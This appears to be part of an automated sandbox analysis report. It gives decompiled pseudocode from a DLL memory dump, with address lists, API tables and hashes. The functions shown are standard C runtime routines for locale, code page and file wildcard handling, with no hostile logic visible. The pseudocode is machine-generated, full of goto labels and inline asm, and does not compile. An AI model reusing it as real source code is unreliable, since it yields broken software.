								if(_t18 != 0) {
									_t17 = E6E20F58D(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0xfde8fe81
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















    0x6e21cb34
    0x6e21cb35
    0x6e21cb3c
    0x6e21cbe0
    0x6e21cbee
    0x6e21cbf9
    0x6e21cbff
    0x6e21cc04
    0x6e21cc06
    0x6e21cc06
    0x6e21cc0c
    0x6e21cc11
    0x6e21cc11
    0x6e21cbfb
    0x6e21cbfb
    0x00000000
    0x6e21cbfb
    0x6e21cb42
    0x6e21cb47
    0x00000000
    0x00000000
    0x6e21cb4d
    0x6e21cb52
    0x6e21cb54
    0x6e21cb54
    0x6e21cb5a
    0x00000000
    0x00000000
    0x6e21cb5f
    0x6e21cb76
    0x6e21cb76
    0x6e21cb7f
    0x6e21cb81
    0x00000000
    0x00000000
    0x6e21cb83
    0x6e21cb88
    0x6e21cb8a
    0x6e21cb8a
    0x6e21cb90
    0x00000000
    0x00000000
    0x6e21cb95
    0x6e21cbb3
    0x6e21cbb5
    0x6e21cbd8
    0x00000000
    0x6e21cbdd
    0x6e21cbc5
    0x6e21cbd0
    0x00000000
    0x00000000
    0x6e21cbd2
    0x00000000
    0x6e21cbd2
    0x6e21cb97
    0x6e21cb9f
    0x00000000
    0x00000000
    0x6e21cba1
    0x6e21cba4
    0x6e21cbaa
    0x00000000
    0x00000000
    0x00000000
    0x6e21cbac
    0x6e21cbae
    0x6e21cbb0
    0x00000000
    0x6e21cbb0
    0x6e21cb61
    0x6e21cb69
    0x00000000
    0x00000000
    0x6e21cb6b
    0x6e21cb6e
    0x6e21cb74
    0x00000000
    0x00000000
    0x00000000
    0x6e21cb74
    0x6e21cb7a
    0x6e21cb7c
    0x00000000

    APIs
    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6E21CE4E,?,00000000), ref: 6E21CBC8
    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6E21CE4E,?,00000000), ref: 6E21CBF1
    • GetACP.KERNEL32(?,?,6E21CE4E,?,00000000), ref: 6E21CC06
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: InfoLocale
    • String ID: ACP$OCP
    • API String ID: 2299586839-711371036
    • Opcode ID: b6726d2e6cc2284b84bde912b25ea16d80bda2f9e0bbb3d21ca38d78e230e948
    • Instruction ID: 917291aee3cc2081f9c02be5241a2c82acf27f39e8db5e7fc47fc673910dc7d5
    • Opcode Fuzzy Hash: b6726d2e6cc2284b84bde912b25ea16d80bda2f9e0bbb3d21ca38d78e230e948
    • Instruction Fuzzy Hash: 9521863965C10A9BD7588FD5C902AC773E7AB45F61B654474EA0ADF104E732DF40C790
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21CD03, Relevance: 7.7, APIs: 5, Instructions: 188COMMON
    Download Yara Rule
    C-Code - Quality: 84%
    			E6E21CD03(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0x6e24b164; // 0x1dc3c76f
				_v8 = _t39 ^ _t109;
				_t89 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E6E20FA06(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6E20FA06(_t89, __ecx, __edx);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t92 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x6e241644; // 0x17
					E6E21CCA6(0, 0x6e241530, _t85 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					E6E21C643(_t92, _t99,  &_v20);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						E6E21C729(_t92, _t99,  &_v20);
					} else {
						E6E21C68E(_t92, _t99,  &_v20);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x6e24152c; // 0x41
						_t77 = E6E21CCA6(_t99, 0x6e241220, _t75 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t108 = E6E21CB2F(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t108;
								if(_t108 == 0) {
									goto L22;
								}
								__eflags = _t108 - 0xfde8;
								if(_t108 == 0xfde8) {
									goto L22;
								}
								__eflags = _t108 - 0xfde9;
								if(_t108 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t108;
								}
								E6E213B4D(_t89, _t94, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E6E203D51(_v8 ^ _t109);
								}
								_t33 =  &(_t89[0x90]); // 0x6e211a8e
								E6E213B4D(_t89, _t94, _t103, _t108, __eflags, _v16, _t33, 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t36 =  &(_t89[0x40]); // 0x6e2119ee
								_t68 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								_t38 =  &(_t89[0x80]); // 0x6e211a6e
								E6E21E65A(_t38, _t108, _t38, 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E6E21C729(_t92, _t99,  &_v20);
						} else {
							E6E21C68E(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}


































    0x6e21cd0b
    0x6e21cd12
    0x6e21cd19
    0x6e21cd1d
    0x6e21cd21
    0x6e21cd2f
    0x6e21cd34
    0x6e21cd35
    0x6e21cd36
    0x6e21cd37
    0x6e21cd3f
    0x6e21cd41
    0x6e21cd47
    0x6e21cd4d
    0x6e21cd50
    0x6e21cd52
    0x6e21cd55
    0x6e21cd59
    0x6e21cd60
    0x6e21cd6d
    0x6e21cd72
    0x6e21cd75
    0x6e21cd78
    0x6e21cd78
    0x6e21cd7a
    0x6e21cd7d
    0x6e21cd81
    0x6e21cdf1
    0x6e21cdf3
    0x6e21cdf5
    0x6e21ce08
    0x6e21ce08
    0x6e21ce0f
    0x6e21ce15
    0x6e21ce18
    0x00000000
    0x6e21ce18
    0x6e21cdf7
    0x6e21cdfa
    0x00000000
    0x00000000
    0x6e21ce00
    0x6e21ce05
    0x00000000
    0x6e21cd88
    0x6e21cd88
    0x6e21cd8c
    0x6e21cda2
    0x6e21cd93
    0x6e21cd97
    0x6e21cd97
    0x6e21cdab
    0x6e21cdac
    0x6e21ce36
    0x6e21ce36
    0x00000000
    0x6e21cdb2
    0x6e21cdb2
    0x6e21cdc1
    0x6e21cdc6
    0x6e21cdcb
    0x6e21ce1b
    0x6e21ce1b
    0x6e21ce1b
    0x6e21ce1d
    0x6e21ce21
    0x6e21ce38
    0x6e21ce44
    0x6e21ce4e
    0x6e21ce51
    0x6e21ce52
    0x6e21ce54
    0x00000000
    0x00000000
    0x6e21ce56
    0x6e21ce5c
    0x00000000
    0x00000000
    0x6e21ce5e
    0x6e21ce64
    0x00000000
    0x00000000
    0x6e21ce6a
    0x6e21ce70
    0x6e21ce72
    0x00000000
    0x00000000
    0x6e21ce79
    0x6e21ce7f
    0x6e21ce81
    0x00000000
    0x00000000
    0x6e21ce83
    0x6e21ce86
    0x6e21ce88
    0x6e21ce8a
    0x6e21ce8a
    0x6e21ce9b
    0x6e21cea0
    0x6e21cea2
    0x6e21cf02
    0x6e21ce25
    0x6e21ce35
    0x6e21ce35
    0x6e21cea7
    0x6e21ceb1
    0x6e21cec1
    0x6e21cec7
    0x6e21cec9
    0x00000000
    0x00000000
    0x6e21ced1
    0x6e21cee0
    0x6e21cee6
    0x6e21cee8
    0x00000000
    0x00000000
    0x6e21cef2
    0x6e21cefa
    0x00000000
    0x6e21ceff
    0x6e21ce23
    0x00000000
    0x6e21ce23
    0x6e21cdcd
    0x6e21cdcf
    0x6e21cdd3
    0x6e21cde9
    0x6e21cdda
    0x6e21cdde
    0x6e21cdde
    0x6e21cdee
    0x00000000
    0x6e21cdee
    0x6e21cdac

    APIs
      • Part of subcall function 6E20FA06: GetLastError.KERNEL32(?,?,6E20A016,6E249300,0000000C,6E1F9063,6E2000BE,?,00000001), ref: 6E20FA0A
      • Part of subcall function 6E20FA06: _free.LIBCMT ref: 6E20FA3D
      • Part of subcall function 6E20FA06: SetLastError.KERNEL32(00000000,6E249300,0000000C,6E1F9063,6E2000BE,?,00000001,?,?,?,?,?,?,?,6E200044), ref: 6E20FA7E
      • Part of subcall function 6E20FA06: _abort.LIBCMT ref: 6E20FA84
      • Part of subcall function 6E20FA06: _free.LIBCMT ref: 6E20FA65
      • Part of subcall function 6E20FA06: SetLastError.KERNEL32(00000000,6E249300,0000000C,6E1F9063,6E2000BE,?,00000001,?,?,?,?,?,?,?,6E200044), ref: 6E20FA72
    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E21CE0F
    • IsValidCodePage.KERNEL32(00000000), ref: 6E21CE6A
    • IsValidLocale.KERNEL32(?,00000001), ref: 6E21CE79
    • GetLocaleInfoW.KERNEL32(?,00001001,6E21196E,00000040,?,6E211A8E,00000055,00000000,?,?,00000055,00000000), ref: 6E21CEC1
    • GetLocaleInfoW.KERNEL32(?,00001002,6E2119EE,00000040), ref: 6E21CEE0
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
    • String ID:
    • API String ID: 745075371-0
    • Opcode ID: d577f917c9cf4ae398f00e1e5f4b874884a24022d61796fd8e170c066c0c409e
    • Instruction ID: b61778b1c638a03508d607e9528fc3b4f452c8531b74c3039a0d989e004d8fab
    • Opcode Fuzzy Hash: d577f917c9cf4ae398f00e1e5f4b874884a24022d61796fd8e170c066c0c409e
    • Instruction Fuzzy Hash: 6B517379A0820F9BEB08DBE5CC46AEA77FAAF05B01F040475EA14EF140E7709B44CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E218626, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
    Download Yara Rule
    C-Code - Quality: 67%
    			E6E218626(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E6E20FB55(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E6E21D133(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E6E218865(_a16, __eflags, _t111);
							E6E20FBB2(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E6E21D133(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E6E208956();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x6e24b164; // 0x1dc3c76f
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E6E21E070(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E6E2057E0(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E6E218626(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E6E21DC90(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E6E21847E);
									}
								} else {
									_push(_t55);
									_t57 = E6E218626(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E6E218626(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E6E203D51(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}















































    0x6e21862b
    0x6e21862c
    0x6e21862f
    0x6e21862f
    0x6e218632
    0x6e218632
    0x6e218634
    0x6e218635
    0x6e21863e
    0x6e21863f
    0x6e218642
    0x6e218645
    0x6e21864a
    0x6e218651
    0x6e218652
    0x6e218653
    0x6e218656
    0x6e218660
    0x6e218663
    0x6e218664
    0x6e218666
    0x6e21867a
    0x6e21867a
    0x6e21867d
    0x6e218687
    0x6e21868c
    0x6e21868f
    0x6e218691
    0x00000000
    0x6e218693
    0x6e218697
    0x6e2186a0
    0x6e2186a6
    0x00000000
    0x6e2186a9
    0x6e218668
    0x6e218668
    0x6e21866e
    0x6e218673
    0x6e218676
    0x6e218678
    0x6e2186af
    0x6e2186b1
    0x6e2186b2
    0x6e2186b3
    0x6e2186b4
    0x6e2186b5
    0x6e2186b6
    0x6e2186bb
    0x6e2186bf
    0x6e2186c1
    0x6e2186c7
    0x6e2186ce
    0x6e2186d1
    0x6e2186d4
    0x6e2186d5
    0x6e2186d8
    0x6e2186d9
    0x6e2186dc
    0x6e2186dd
    0x6e2186fe
    0x6e2186fe
    0x6e218700
    0x00000000
    0x00000000
    0x6e2186e5
    0x6e2186e7
    0x6e2186e9
    0x6e2186eb
    0x6e2186ed
    0x6e2186ef
    0x6e2186f1
    0x6e2186fc
    0x00000000
    0x6e2186fc
    0x6e2186f1
    0x6e2186ed
    0x00000000
    0x6e2186e9
    0x6e218702
    0x6e218704
    0x6e218707
    0x6e218720
    0x6e218720
    0x6e218722
    0x6e218725
    0x6e218735
    0x6e218737
    0x6e218737
    0x6e218727
    0x6e218727
    0x6e21872a
    0x00000000
    0x6e21872c
    0x6e21872c
    0x6e21872f
    0x00000000
    0x6e218731
    0x6e218731
    0x6e218731
    0x6e21872f
    0x6e21872a
    0x6e21873d
    0x6e218745
    0x6e218749
    0x6e218757
    0x6e21875c
    0x6e218771
    0x6e218773
    0x6e218779
    0x6e21877c
    0x6e2187ae
    0x6e2187ae
    0x6e2187b0
    0x6e2187b3
    0x6e2187b9
    0x6e2187b9
    0x6e2187c0
    0x6e2187da
    0x6e2187da
    0x6e2187e9
    0x6e2187ee
    0x6e2187f1
    0x6e2187f3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e2187c2
    0x6e2187c2
    0x6e2187c8
    0x6e2187ca
    0x00000000
    0x6e2187cc
    0x6e2187cc
    0x6e2187cf
    0x00000000
    0x6e2187d1
    0x6e2187d1
    0x6e2187d8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e2187d8
    0x6e2187cf
    0x6e2187ca
    0x00000000
    0x6e2187f5
    0x6e2187fd
    0x6e218803
    0x6e218805
    0x6e218805
    0x6e21880d
    0x6e218812
    0x6e21881a
    0x6e21881d
    0x6e21881f
    0x6e218833
    0x6e218838
    0x6e21877e
    0x6e21877e
    0x6e218782
    0x6e21878a
    0x6e21878a
    0x6e21878a
    0x6e21878c
    0x6e21878f
    0x6e218792
    0x6e218792
    0x6e218709
    0x6e21870c
    0x6e21870e
    0x00000000
    0x6e218710
    0x6e218710
    0x6e218716
    0x6e21871b
    0x6e21870e
    0x6e21879f
    0x6e2187aa
    0x00000000
    0x00000000
    0x00000000
    0x6e218678
    0x6e21864c
    0x6e21864e
    0x6e2186aa
    0x6e2186ae
    0x6e2186ae
    0x00000000

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: .
    • API String ID: 0-248832578
    • Opcode ID: 3e94fddc4d0fcc8d1f44b6d89ba32a3fbb040c312dfa1295a22abdc2dde3e3d6
    • Instruction ID: 14a3bc0e7e9bde7586fdbb79e3f0b00eb3821cd6b53191f42c86b0687f2b6b12
    • Opcode Fuzzy Hash: 3e94fddc4d0fcc8d1f44b6d89ba32a3fbb040c312dfa1295a22abdc2dde3e3d6
    • Instruction Fuzzy Hash: 0E31287580824EAFCB188EB8CCC4EEB7BFFEB85345F040598EA19D7250E6309A45CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20B767, Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 296COMMON
    Download Yara Rule
    C-Code - Quality: 75%
    			E6E20B767(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				intOrPtr* _t106;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				intOrPtr _t172;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				void* _t193;
				signed int _t195;
				intOrPtr _t198;
				short* _t210;
				intOrPtr* _t212;
				intOrPtr* _t216;
				signed int _t217;
				signed int _t218;
				void* _t219;
				void* _t220;

				_t101 =  *0x6e24b164; // 0x1dc3c76f
				_v8 = _t101 ^ _t218;
				_t212 = _a4;
				_t170 = 0;
				_v64 = _t212;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t212 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t212;
				_v72 = 0;
				if(_t172 == 0) {
					__eflags =  *(_t212 + 0x8c);
					if( *(_t212 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t212 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t212 + 0x90) = _t170;
					 *_t212 = 0x6e23e570;
					 *((intOrPtr*)(_t212 + 0x94)) = 0x6e23e7f0;
					 *((intOrPtr*)(_t212 + 0x98)) = 0x6e23e970;
					 *((intOrPtr*)(_t212 + 4)) = 1;
					L41:
					return E6E203D51(_v8 ^ _t218);
				}
				_t106 = _t212 + 8;
				_v44 = 0;
				if( *_t106 != 0) {
					L3:
					_v44 = E6E20FB55(_t172, 1, 4);
					E6E20FBB2(_t170);
					_v32 = E6E20FB55(_t172, 0x180, 2);
					E6E20FBB2(_t170);
					_v36 = E6E20FB55(_t172, 0x180, 1);
					E6E20FBB2(_t170);
					_v40 = E6E20FB55(_t172, 0x180, 1);
					E6E20FBB2(_t170);
					_t198 = E6E20FB55(_t172, 0x101, 1);
					_v52 = _t198;
					E6E20FBB2(_t170);
					_t220 = _t219 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t198 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						E6E20FBB2(_v44);
						E6E20FBB2(_v32);
						E6E20FBB2(_v36);
						E6E20FBB2(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t198) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t212 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t236 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t198 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t130 = E6E215FB6(_t198, _t212, _t236, _t170,  *((intOrPtr*)(_t212 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t212 + 8), _t170);
						_t220 = _t220 + 0x24;
						_t237 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t198 + 1; // 0x1
						_t134 = E6E215FB6(_t198, _t212, _t237, _t170,  *((intOrPtr*)(_t212 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t212 + 8), _t170);
						_t220 = _t220 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = E6E215C7C(_t170, _t198, _t212, _t243, _t170, 1, _t198, 0x100, _v32 + 0x100,  *(_t212 + 8), _t170);
							_t220 = _t220 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t216 = _v64;
								if( *((intOrPtr*)(_t216 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										E6E20FBB2( *(_t216 + 0x90) - 0xfe);
										E6E20FBB2( *(_t216 + 0x94) - 0x80);
										E6E20FBB2( *(_t216 + 0x98) - 0x80);
